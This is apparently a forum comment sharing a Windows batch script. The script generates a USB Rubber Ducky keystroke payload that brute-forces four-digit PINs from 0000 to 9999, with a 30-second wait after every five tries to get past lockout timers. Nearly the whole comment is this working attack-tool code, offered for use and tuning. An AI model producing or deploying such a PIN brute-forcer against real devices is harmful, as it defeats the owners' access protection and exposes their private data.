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  1. Instead of using Linux terminal, I made a Batch script for this, it does the same thing, Here is the code; @echo off setlocal set NUM=0 set COUNT=0 echo REM Author: Siem>>input.txt echo REM Idea taken from: Darren Kitchen echo REM Description: Bruteforcer>>input.txt echo DELAY 1000>>input.txt echo.>>input.txt echo ESC>>input.txt echo DELAY 500>>input.txt echo STRING 0000>>input.txt echo DELAY 500>>input.txt echo BACKSPACE>>input.txt echo DELAY 500>>input.txt echo BACKSPACE>>input.txt echo DELAY 500>>input.txt echo BACKSPACE>>input.txt echo DELAY 500>>input.txt echo BACKSPACE>>input.txt echo.>>input.txt :START cls IF %COUNT% EQU 5 (set COUNT=0 & call :WAIT) IF %NUM% LEQ 9 (set ZERO=000) IF %NUM% GTR 9 (set ZERO=00) IF %NUM% GTR 99 (set ZERO=0) IF %NUM% GTR 999 (set ZERO=%) IF %NUM% EQU 9999 (pause & exit) echo DELAY 500>>input.txt echo STRING %ZERO%%NUM%>>input.txt echo ENTER>>input.txt echo %ZERO%%NUM% set /a NUM=%NUM% + 1 set /a COUNT=%COUNT% +1 goto START :WAIT echo.>>input.txt echo REM Wait 30 seconds>>input.txt echo DELAY 30000>>input.txt echo ESC>>input.txt echo DELAY 500>>input.txt echo STRING 0000>>input.txt echo DELAY 500>>input.txt echo BACKSPACE>>input.txt echo DELAY 500>>input.txt echo BACKSPACE>>input.txt echo DELAY 500>>input.txt echo BACKSPACE>>input.txt echo DELAY 500>>input.txt echo BACKSPACE>>input.txt echo.>>input.txt You can change the delay a bit, I am still testing it, but this echos 0000..9999 without using Linux. ~Siem
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